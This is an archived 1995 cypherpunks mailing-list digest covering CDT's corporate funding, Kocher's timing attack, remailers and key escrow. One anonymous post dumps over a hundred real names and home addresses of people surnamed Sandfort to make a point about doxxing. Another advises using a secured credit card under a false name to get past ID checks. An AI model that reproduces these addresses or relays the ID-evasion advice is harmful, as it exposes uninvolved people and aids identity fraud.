> funding for the medical privacy project -- zero," Berman said.
>      But critics of the CDT's position on the legislation were
> skeptical.
>      "During the Senate hearing this week, Senator Bennett was
> angered at the suggestion that S. 1360 was an industry bill,"
> said Jamie Love of Ralph Nader's Center for Study of Responsive
> Law. "He claimed that he had widely consulted with privacy groups
> and patient advocates. CDT's Janlori Goldman was the key person
> who decided who was in the loop, and who was not in the loop on
> this issue. Groups that were not receptive to the idea of massive
> database systems of personal medical records were excluded from
> deliberations."
>      "To find out that CDT has been funded by companies such as
> Equifax, TRW, Dunn & Bradstreet, IBM and the telephone companies
> is remarkable, because these are among the groups who have the
> most at stake in legitimizing and preserving the current system
> of maintaining and managing medical records," Love said. "I think
> that Janlori Goldman should have mentioned in her Senate
> testimony that CDT was funded by corporations who have an
> interest in this issue."
>      "If CDT were doing its job, TRW and Equifax wouldn't want to
> give it money," Love added.
>      Harold Eist, president-elect of the American Psychiatric
> Association, said that "any datagathering and large computer
> company would clearly benefit from legislation that drives large
> amounts of individually identified data about American citizens
> into data banks without the knowledge and permission of those
> American citizens." 
>      "Selling that information would represent a gold mine for
> those companies," Eist said.
>      "It is not surprising that an organization with a
> disingenuous name -- Center for Democracy & Technology -- would
> be supporting a bill with a disingenuous name -- The Medical
> Records Confidentiality Act," Eist said. "In fact, this bill
> represents an effort to give away the privacy of American
> citizens without their knowledge."
>      "My understanding is that Janlori Goldman was involved in
> writing the bill," Eist said. "It seems to me that as a former
> civil libertarian, she should know very well that there are
> loopholes in that bill regarding protections to privacy that you
> could drive a Mack truck through." 
>      "Unless people can be assured that their privacy will be
> protected, there is little or no chance that they will reveal the
> kind of tormented and dark secrets that they have to reveal to
> recover from their illnesses," Eist said. "Confidentially is the
> sine qua non of medical treatment, and especially if it is
> psychiatric medical treatment."
>      A driving force behind the effort to derail the
> Bennett/Leahy bill is Denise Nagel, a Boston physician who
> organized the Coalition for Patient Rights of New England "to
> restore confidentiality to the doctor-patient relationship."
>      Nagel refused to comment on CDT's funding.
>      At the Senate hearing last week, Nagel told the committee "I
> have no industry ties."
>      Nagel charged that S. 1360 was written "to advance the
> interests of certain segments of the computer,
> telecommunications, data processing and health-care industries."
>      "With this bill they would be able to careen full speed
> ahead to develop data networks that will give innumerable people
> access to our medical records legally and without our knowledge,"
> Nagel said.
>      "I am convinced that S. 1360 is not at all primarily
> concerned with the confidentiality of medical records," Nagel
> told the committee. "It is just the opposite. It talks about
> informed consent, but then authorizes the creation of databases
> without patient knowledge or consent. It talks about individual
> rights, and then allows police broad authority to search
> databases directly instead of obtaining a specific record from
> the patient's doctor. It talks about civil and criminal
> sanctions, and then pre-empts all common law and most existing
> and future state statutes. It talks about ensuring personal
> privacy with respect to medical records, and then sets a ceiling
> rather than a floor on medical confidentiality."
> 
> AT A GLANCE: CENTER FOR DEMOCRACY AND TECHNOLOGY FUNDING, 1994-
> 1995
> 
> American Advertising Federation         500.00
> America Online, Inc.                 25,000.00
> Apple Computer Inc.                  50,000.00
> AT&T                                 75,000.00
> Bell Atlantic                        60,000.00
> Business Software Alliance            6,000.00
> Cellular Tellecomm Indust Assn       10,000.00
> CompuServ                            30,000.00
> Delphi Internet Services Corp        10,000.00
> Direct Marketing Association          5,000.00
> Dunn & Bradstreet Corp               10,000.00
> EMA                                   5,000.00
> Equifax Inc.                          5,000.00
> John Gilmore                          2,500.00
> Hartford Foundation                 153,000.00    
> IBM                                  25,000.00
> Information Technology Industry       5,000.00
> Interactive Digital Software          5,000.00
> Lotus                                 6,250.00
> MARC                                 80,000.00
> MCI Telecommunications               15,000.00
> Microsoft                           100,000.00
> National Cable Television Assn       15,000.00
> Netscape Communications Corp          5,000.00
> Newspaper Association of Am           5,000.00
> Nynex Government Affairs             25,000.00
> Pacific Telesis                      25,000.00
> Prodigy Service Company              10,000.00
> Software Publishers Assn             10,000.00
> Time Warner Inc                       5,000.00
> TRW Information Svcs                 10,000.00
> US Telephone Association             10,000.00
> US West Inc                          10,000.00
> 
> Total Funding                        814,020.00
> 
> Received 1994                        114,377.00
> Received 1995                        699,643.00
> 
> Total Funding                        814,020.00
> 
> 
> 
> Russell Mokhiber
> russell@essential.org
> voice: 202/429-6928
> 

[big birdie follows]

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 16 Dec 1995 03:00:13 +0800
To: JWRCLUM@aol.com
Subject: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
In-Reply-To: <9512150734.AA0051@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951214232857.10286G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My friend Clark wrote:

>Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
>money."

I believe that was Woodward & Bernstein. They were referring to some
right-wing wackos who had flagrantly broken the law investigating their
political opposition, then very sloppily tried to cover it up. Woodward &
Bernstein brought down a President. I think they're cool (though they seem
to have rested on their laurels, and their subsequent work is less
impressive). 

Anyway, Russell, did you ever get a followup to this? I don't see a
response on CDT's Web page, so I assume the funding issue never hit the 
"mainstream." I haven't been following the relevant lists and newsgroups.

While Leahy, the medical privacy bill's chief sponsor, is generally regarded 
as a White Hat (he led the opposition to Exon), I do have serious 
concerns about the issues that have been raised. I'm aware of the CDT's 
break with the EFF and have questioned their "maturity" before. It's 
possible they were "co-opted" or naive.

But at least the CDT cites its sources (like the full text of the bill and
testimony), and allows financial disclosure. This is not true of some less
reputable fringe organizations and publications. 

As for Clark's implied threats (I'm not entirely sure how much to read
into them, probably not much), I am of course aware of the vulnerability
of my personal records, and live my life accordingly. This includes
monitoring fraudulent requests for credit and medical records and being
completely honest with friends and employers. This is the "other" reason
I'm on cypherpunks. Would that we would all do the same. 

As for Clark knowing that I'm an274074@anon.penet.fi, well DUH. I've
posted that several times. It's advertised as a means for people
uninformed about remailers and such to send me anonymous tips. 

As Woody Allen once said, be fruitful and multiply.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNEtGo3DXUbM57SdAQEkGAP/d7pefEMU3gEMfjZnAz+vOhm4SmEbwVho
HlzGG8JKsie+3htqg3K04lZLse1RmcAgRoa71YaO0uaN6J0xmQA2Bd7f2Y/4kWwP
aetQsGtresxvTIq7tg+AZ6MNTADalVvojfKh2MeeVcEV3izMfZOqvd/9X77YMRdC
d4vBQwl1PuQ=
=ayJ1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Fri, 15 Dec 1995 21:43:12 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE? [getting noisy]
Message-ID: <m0tQU48-0005N0C@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:

[Sandfort summer picnic invitation list deleted]
> 
> 
>       This took about a minute using a shabby consumer-level DB.
>       *Now* do you get it?
> 
> 
> Hieronymous
> 

Well, "information wants to be free", and all that stuff...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 16 Dec 1995 00:29:40 +0800
To: jmb@FreeBSD.ORG
Subject: Re: kocher's timing attack
Message-ID: <199512151457.GAA27245@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: dreschs@austnsc.tandem.com (Sten Drescher)
> On Firewalls, "Jonathan M. Bresler" <jmb@FreeBSD.ORG> said:
> JMB> After
> JMB> several large key signing parties hundreds of known ciphertexts
> JMB> could have been generated using Alice's key--each one a public key
> JMB> of someone else.  over several years it piles up.  the known
> JMB> ciphertexts can be tested/analyzed to yield Alice's secret key.
> JMB> ouch.  ;/
> 
> 	Are you sure about this?  It would seem that the same principle
> would then apply to signed messages as well, and I find it a bit hard to
> believe that signing messages would make ones key pair vulnerable.

As Kocher's paper implies, the known ciphertext attack is a TIMING
attack.  Simply accumulating known text/signature pairs as you would have
after a "key signing party" does not help.  You must know exactly how
much time each signature took.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Dec 1995 14:42:02 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150601.HAA14657@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                           SANDY SANDFORT
      . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . "
wrote:



>C'punks,
>
>So far, no one has come up with anything stronger than specula-
>tion about my database question.  Some "anonymous" told me how
>easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
>didn't give the guy my phone number.

      You don't get it, do you?


Sandfort A & K
Irvine, CA  92714

Sandfort Christine
San Jose, CA  95113

Sandfort Curtis J
19841 River Rd
Gladstone, OR  97027-2285

Sandfort D
105 Cypress Ave
Santa Cruz, CA  95062-3710

Sandfort D O
780 N Circle D Way
Tucson, AZ  85748-3845

Sandfort Glenn & Sophia
24314 Carter Rd
Bothell, WA  98021-9413

Sandfort Jack
4057 Lower Honoapiilani Rd
Wailuku, HI  96793

Sandfort Jack L
6761 Hwy 49 N
Mariposa, CA  95338

Sandfort Joe
1203 SE Malden St
Portland, OR  97202-5935

Sandfort Rebecca F
1111 E Apache Blvd
Tempe, AZ  85281-8600

Sandfort Rick
850 Kimball Rd
Red Bluff, CA  96080-4533

Sandfort Robert & Marian
8575 Rue Jenny Ln
Los Molinos, CA  96055-9729

Sandfort Robert Jr & Joann
859 Locust St
Red Bluff, CA  96080-4218

Sandfort Astrid
3 Channing Cir
Cambridge, MA  02138-4715

Sandfort D
640 Sfourth Ave
Pleasantville, NJ  08232

Sandfort E
2641 Ridge Ave
Pleasantville, NJ  08233

Sandfort Ed & Donna
15 Kristin Way
Trenton, NJ  08690-2441

Sandfort Edward
8 Sixpence Ct
Huntington, NY  11743-6436

Sandfort G B
187 E 7th St
Clifton, NJ  07011-1739

Sandfort John
19 Sanfort Ln
Warwick, NY  10990-3136

Sandfort K
10 Annette Dr
Portsmouth, RI  02871-3704

Sandfort Karl
Spencer Rd
Red Hook, NY  12571

Sandfort Peter & Sandr
9 Peach Hill Ct
Ramsey, NJ  07446-1226

Sandfort Phil P
3907 Rippleton Rd
Cazenovia, NY  13035-9602

Sandfort R
481 Smithburg Ct
Jackson, NJ  08527-4444

Sandfort Sherri
434 W 52nd St
New York, NY  10019-6340

Sandfort Thomas D
1819 Beach Blvd
Point Pleasant, NJ  08742-5218

Sandfort A
235 Larry St
Augusta, KS  67010-1906

Sandfort Brad
Catrock Rd
Lake Ozark, MO  65049

Sandfort Brian
1215 11th St
West Des Moines, IA  50265-2574

Sandfort Charles
RR 3
Humboldt, NE  68376-9803

Sandfort David G
3610 W Clay St
Saint Charles, MO  63301-4433

Sandfort David G Cpa
3660 W Clay St
Saint Charles, MO  63301-4433

Sandfort David L
820 Timberwood Cir
Mc Kinney, TX  75069-9183

Sandfort Ed
Rm 307 1043 10th
Humboldt, NE  68376

Sandfort Edward L
4436 Windsor Ave
Kansas City, MO  64123-1736

Sandfort Fred F
1655 S Grorgetown
Wichita, KS  67208

Sandfort G
133 Kunze Dr
Saint Charles, MO  63303-5928

Sandfort G H
9802 NW Shaggy Bark Ln
Kansas City, MO  64152-2560

Sandfort Gerhard
1813 S Washington St
Casper, WY  82601-4853

Sandfort Gerhard Jr & Melanie
1500 W Odell Ave
Casper, WY  82604-4708

Sandfort Harold & Jackie
RR 2 Box 209a
Fremont, NE  68025-9696

Sandfort Howser
RR 3
Eldon, MO  65026-9803

Sandfort Irvin J
3614 W Clay St
Saint Charles, MO  63301-4433

Sandfort J
3229 Herrington Dr
Casper, WY  82604-5421

Sandfort James
844 Hollyridge Dr
Ballwin, MO  63011-3552

Sandfort Jane L
6009 Sandhurst Ln
Dallas, TX  75206-4730

Sandfort John R
214 Columbia St
Augusta, KS  67010-1535

Sandfort Kay
1024 S Spruce St
Casper, WY  82601-3621

Sandfort Keith
1315 East Ave
Holdrege, NE  68949-1323

Sandfort Larry
3034 W State St
Springfield, MO  65802-5168

Sandfort Leland K
Catrock Rd
Lake Ozark, MO  65049

Sandfort Loyd
108 W Brockman Ave
Eldon, MO  65026-2206

Sandfort Melvin
114 N Benton Ave
Saint Charles, MO  63301-2708

Sandfort Michael
844 Judson St
Lincoln, NE  68521-2633

Sandfort Michael
RR 1
Talmage, NE  68448-9801

Sandfort Neil
623 N 6th St
Seward, NE  68434-1405

Sandfort Robert
RR 1
Brock, NE  68320-9801

Sandfort Robert M
3612 W Clay St
Saint Charles, MO  63301-4433

Sandfort Roger
RR 3
Eldon, MO  65026-9803

Sandfort Ross
303 9th
Brock, NE  68320

Sandfort S C
Rt 1 Box 145-Dd
Augusta, KS  67010

Sandfort Sara
202 Manor Dr
Eldon, MO  65026-9678

Sandfort Waldo D
2150 Randolph St
Saint Charles, MO  63301-0844

Sandfort Wayne W
6969 Brentwood Ct
Arvada, CO  80004-1900

Sandfort Wm
PO Box 1393
Lake Ozark, MO  65049-1393

Sandfort Eva Rl Est
901 S Pine St
Spartanburg, SC  29302-3310

Sandfort Eva Rlest
901 S Pine St
Spartanburg, SC  29302-3310

Sandfort F
108 Thistle Knoll Ct
Asheville, NC  28803-2014

Sandfort John P
209 Woodgrove Trce
Spartanburg, SC  29301-6431

Sandfort John W
6540 Greyledge Ct
Alexandria, VA  22310-2410

Sandfort Mark R
Oakdale, PA  15071

Sandfort Marni
2140 L St NW
Washington, DC  20037-1510

Sandfort Raymond

Warren Center, PA  18851

Sandfort Ruth A
111 Jonthnct
Oakdale, PA  15071

Sandfort Sarah
114 Maury Ave
Charlottesville, VA  22903-3058

Sandfort Clarence
1016 Highway 63
Baldwin, WI  54002

Sandfort Daryl L
12676 W Hart St
Waukegan, IL  60087-1122

Sandfort David J
14 Wintergreen Ct
Downers Grove, IL  60517-1713

Sandfort E F
2400 S Finley Rd
Lombard, IL  60148-7029

Sandfort Gary
340 N Plum St
Carlinville, IL  62626-1316

Sandfort George
1380 Maple St
Baldwin, WI  54002-9395

Sandfort J
300 3rd St
Ann Arbor, MI  48103-4307

Sandfort J
6947 N Elm Tree Rd
Milwaukee, WI  53217-3705

Sandfort James
34217 N Stonebrdg Ln
Grayslake, IL  60030

Sandfort James
314 Oakridge Dr N
Hudson, WI  54016-1117

Sandfort John
3101 N 13th St
Terre Haute, IN  47804-1233

Sandfort John P
3149 N Mountain Maple Ct
South Bend, IN  46628-3716

Sandfort Larry
8225 Knox Ave S
Minneapolis, MN  55431-1413

Sandfort M Thos
2034 Chandler Ln
Columbus, IN  47203-4015

Sandfort Melissa
910 Lake St
Evanston, IL  60201-4319

Sandfort Melissa
706 Seward St
Evanston, IL  60202-2946

Sandfort Mike
7394 Christie Chapel Rd
Dublin, OH  43017-2415

Sandfort R W
275 E Dunedin Rd
Columbus, OH  43214-3803

Sandfort Ronald G
602 21st Ave W
Menomonie, WI  54751-3825

Sandfort Stephen
607 Washington Blvd
Oak Park, IL  60302-3954

Sandfort Stephen & Rebecca
218 Second Sheb Fls
Sheboygan Falls, WI  53085

Sandfort Steve
2654 Briarcliffe Ave
Cincinnati, OH  45212-1306

Sandfort A M
2903 Nepperhan Rd
Louisville, KY  40218-4715

Sandfort Christopher
10209 Barkley Dr
Jeffersontown, KY  40299-3120

Sandfort Federick H
2495 Paddock Way
Oviedo, FL  32765-8067

Sandfort Greg
1125 Carpenters Trce
Covington, KY  41017-4416

Sandfort J
1550 NE 191st St
Miami, FL  33179-4145

Sandfort Jeff
132 Landing Cir
Hazel Green, AL  35750-8807

Sandfort John F
11 Estes Dr
Bella Vista, AR  72714-5613

Sandfort Joseph & Lynn
311 Castle Blvd
Paris, KY  40361-2455

Sandfort M
14191 Georgian Cir
Fort Myers, FL  33912-5646

Sandfort Michael & Deb
457 Sun Lake Cir
Lake Mary, FL  32746-3332

Sandfort Phillip L
4623 Soundside Dr
Gulf Breeze, FL  32561-9275

Sandfort Road Assembly Of God
205 26th Ct
Phenix City, AL  36869-6463

Sandfort Scott & Robyn
401 E Intendencia St
Pensacola, FL  32501-6139

Sandfort Tad Rev
8304 Quail Run Dr
Zephyrhills, FL  33544-2048

Sandfort Terry N
1680 NE 191st St
Miami, FL  33179-4102

Sandfort Weldon W
407 Rock St
Dardanelle, AR  72834-3402


      This took about a minute using a shabby consumer-level DB.
      *Now* do you get it?


Hieronymous



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNEPY73g0mNE55u1AQGE7AH/VmrgEKI1cf3QoF3sR+tUqjOsbp/5OgOd
nFhuSPro8+W2wJIdNcQ8n4oyo1ecm6UCN90HUBycie5Xh5c4Zebc+A==
=WWU1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 16 Dec 1995 02:01:58 +0800
To: cypherpunks@toad.com
Subject: Re: Kocher's RSA attack
Message-ID: <199512151506.HAA27760@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Derek Atkins <warlord@MIT.EDU>
> I must disagree, software implementations of RSA can and probably do
> allow the timing attacks.  It all depends on the modexp implementation.
> Most implementations that I know of, when performing an x^y mod n will
> require a squarings and b multiplies, where a is the number of bits in
> y and b is the number of 1-bits in y.

This is not enough - Paul Kocher's attack depends on the individual
modular multiplies taking different times.  (Actually, that is for his
attack on Diffie Hellman.  The RSA CRT decryption attack uses a
completely different principle, but I guess we are ignoring that for
now.)  The fact that timing a modular exponentiation would give
information about the density of 1 bits in the exponent is not
particularly new or surprising, as has been mentioned here.  What is
new is that you can actually figure out the specific exponent value.
But that requires variable-timing modmult, not just variable-timing
modexp.

PGP is somewhat unique in having a multiplicity of modmult algorithms
which can be selected at compile time.  I am not sure which of these
might be variable time and which might be fixed.  The most likely place
for time variation IMO is in the modular reduction rather than the
multiply; the multiply is generally deterministic with no variation due
to data values (although as was pointed out here, on some processors a
hardware multiply instruction may take variable time depending on its
inputs).  Some modular reductions involve trial division to some extent
or other, with different numbers of iterations possible depending on
certain (maybe unusual) values.  However I believe at least one of the
PGP modular reductions consists of multiplying by the reciprocal of the
modulus, followed by a fixed shift, and this one should be constant time
on a machine which has constant-time multiplies and shifts.  (This is
just going from memory, I haven't looked at the algorithm in several
years.)

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 15 Dec 1995 21:12:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <2.2b8.32.19951215121704.0089daa8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:20 PM 12/14/95 EDT, E. ALLEN SMITH wrote:

>	The more critical question is likely to be what the people at the local
>MBE/whatever _think_ the rules are. When I last got a box (under my real name,
>in case anyone's wondering), I seem to recall that they'd accept credit cards.
>Once one has one box under a given name, this opens up the possibility of
>getting a secured credit card to make future access easier. However, I believe
>that they do want at least one form of photo ID; I can't remember just off what
>their specifications were.
>	-Allen

I have found that credit cards are very good ID (even though they aren't ID
at all) since people are sure that you can't get one without getting
thoroughly checked out.  A secured credit card in a nome de guerre backed up
with employment photo "ID" will usually get you what you want.

The reason that market access controls like these break down is that they
are dependent on every seller on earth giving up the profit involved in
selling to you.  Sellers are different.  You can usually find one who
doesn't check ID well or is in another jurisdiction (in the case of non
physical transactions).  

A new effect is the spread of libertarian (small L) political ideologies
which means that a growing group of market participants are philosophically
opposed to traditional control regimes.  Eg C2.ORG.

A final problem for control freaks is that Friction Free Capitalism is
eating away at the traditional market institutions that have grown up during
the control era.  Thus if traditional banking, telephony, and electricity
distribution are wiped out by new forms of competitive business activity it
is hard for regulatory agencies to extend their traditional controls to the
new entities.  Budget restraints play a part as does inertia.  All of this
is before the new market players deploy anti control technologies and
procedures.  They are in business because they can displace traditional
quasi-monopoly institutions and often see government as just another
competitor to be bypassed.

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 16 Dec 1995 02:13:52 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512150601.HAA14657@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951215074709.4512A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 15 Dec 1995, Anonymous wrote:

>       You don't get it, do you?
> 
> 
> Sandfort A & K
> Irvine, CA  92714
> . . .
> Sandfort Weldon W
> 407 Rock St
> Dardanelle, AR  72834-3402
> 
> 
>       This took about a minute using a shabby consumer-level DB.
>       *Now* do you get it?

Nope.  MY name isn't on your list.  In addition, my home phone
number is unlisted--therefore contracturally unavailable for 
resale.  *Now* do you get it?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 15 Dec 1995 23:15:59 +0800
To: cypherpunks@toad.com
Subject: Re: "Strongly Voluntary" Key Escrow
Message-ID: <199512151412.JAA30648@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

<snip>

>All of these are "voluntary" key escrow (though I hate that misuse of the
>word "escrow") [...]

I do too, and I hate it enough that I must (again) object to any use of
it where there is not a _NEUTRAL_, _THIRD_ party involved, as explained
before on the list (at length) by me, James A. Donald, and many others.

[So, why are you *again* consuming bandwidth on this subject, Jim?]

Because I love the English language, and because I am quite aware that
those who define the terms end up winning the debate, every time. I do
not want the word "escrow" in a key context to go the way of the word
"voluntary" in an income-tax context (or the word "take" in an enviro-
law context). The government has snaked in a Newspeak meaning for the
latter two terms, but I hope that cypherpunks will only use the term
"GAK" when talking to or about the government. Failure to do so will
not only put "our side" in a worse public-relations position, it may
(in the future) do violence to the English language. While I enjoyed
Tim & Uni's "voluntary" sarcasm, I think we have enough material for
*ample* humor without adding even more words to the Newspeak roll.

<snip>

>there are few circumstances where I think "government certification"

"Government Key Certification" might be an OK compromise-term compared
to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As
you know, I prefered the term "FUCKED," but now we must be "decent" in
our communications. <sigh>

>is even useful, let alone necessary.

I can think of only two, but perhaps there are others:
1. Government employees (but only while working on government time).
2. Convicted felons (I wouldn't include the failed drugwar's felons).

>Any scheme in which the government interjects itself in what would not
>normally involve them can hardly be said to be strictly voluntary.

Indeed, but we have already "lost" the word "voluntary" to Newspeak,
which is why it's necessary to qualify it with words like "strictly"
and "strongly."
JMR
- ----------------------------------------------------------------------
Regards, Jim Ray
http://www.shopmiami.com/prs/jimray
"Thank God we don't get all the government we pay for." -- Will Rogers
[Said back when we paid for (and got) a  _lot_  less government.]
- -----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
- -----------------------------------------------------------------------
Help Phil! e-mail zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMNF6U21lp8bpvW01AQGhXwP/ZDmtjY77AnAnnmddpd/rX93E4nGm7JBg
8KXyM7TGiiifpPfLRLJR3LncS0OE7V6CIcaq6zSox+qK97SfNZJhwP+GUIMegChJ
WiqIaU5el2x6n0KeD/Km4loXMah6o4q4RJyVyo/M3uLlvYsBUyi9i4MQHy6fHpdU
BSBnPIz0j0w=
=9K29
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Fri, 15 Dec 1995 22:57:41 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512150303.VAA10066@cdale1.midwest.net>
Message-ID: <199512151411.JAA24231@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


andr0id@midwest.net writes:
> 
> >  The best way to circumvent something like the below occurring is to have
> >your home phone number listed under a pseudonym with no street address listed
> >and block out *69 and caller-id.  If some entity wants your phone number,
> >give them your business number.
> 
> Another "best way" is to make all calls that you want to be personal with
> a cellular phone.  Most cellular systems don't send ANI and do not provide
> any type of billing information to the phone company.  The number is also by
> nature unlisted and the only way to get it is by you or the cellular 
> carrier.  If the cellular carrier gives your number out without your
> permision or a court order they are in BIG trouble..

My untrained brain sees two problems with this:

1) Cellular systems are inherently less secure than standard telephones,
as anyone who can afford a decent scanner can listen to your conversations
at will.

2) You're relying on someone other than yourself to protect your security,
which is always a bad idea. Cellular carriers, Ma Bell, anyone. Does anyone
on this list really believe that representatives of these organizations
would think twice about bending over and spewing out everything they know
about you? They do it all the time, without your permission and without
valid court orders. 


-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
   Hate, hate your enemies  save, save your friends  find, find your place
 I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Fri, 15 Dec 1995 23:10:08 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>
Message-ID: <9512151425.AA07871@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't think this will work. When you

> if ( (Pfp = fopen(Pfilename, "wb") ) == NULL)

the file will be truncated. Subsequent writes could be anywhere on the
platter; you're building a new file.

I think you can work this way if you open the file for read/write
access, although I'd be more inclined to take the file name into the
directory and then walk the inodes.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 16 Dec 1995 02:47:41 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512151800.KAA11304@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Michael Coates wrote:

> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
> Netscape Communications has awarded two software sleuths $1,000 each for
> finding security gaps in its Netscape Navigator 2.0 software.  The company
> also awarded gifts to 50 other contestants in its "Bugs Bounty" program for
> identifying non-security problems.  (Wall Street Journal 11 Dec 95 B7)

Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
from Netscape for finding the HUGE security flaws in Netscape's existing 
product line??

I can't remember whether they got anything or not ...

(Sorry, but I've been away from the list.  One of those, "fate of the 
Free World hangs in the balance" thingies ... ;-)

Have Netscape and AT&T shown some holiday goodwill, or are they still 
engaged in their felonious freeloading foolishness?



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Dec 1995 18:22:45 +0800
To: cypherpunks@toad.com
Subject: Re: mailing list
Message-ID: <199512150910.KAA21650@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Dec 95 at 1:13, JerelRobertson wrote:

> Hey I want to get on this list.  How do I do it?

There's a test, Jerel.  You may retake it in three months.

We











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 16 Dec 1995 02:11:18 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
In-Reply-To: <Pine.ULT.3.91.951214232857.10286G-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSF.3.91.951215102324.2719A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Rich Graves wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
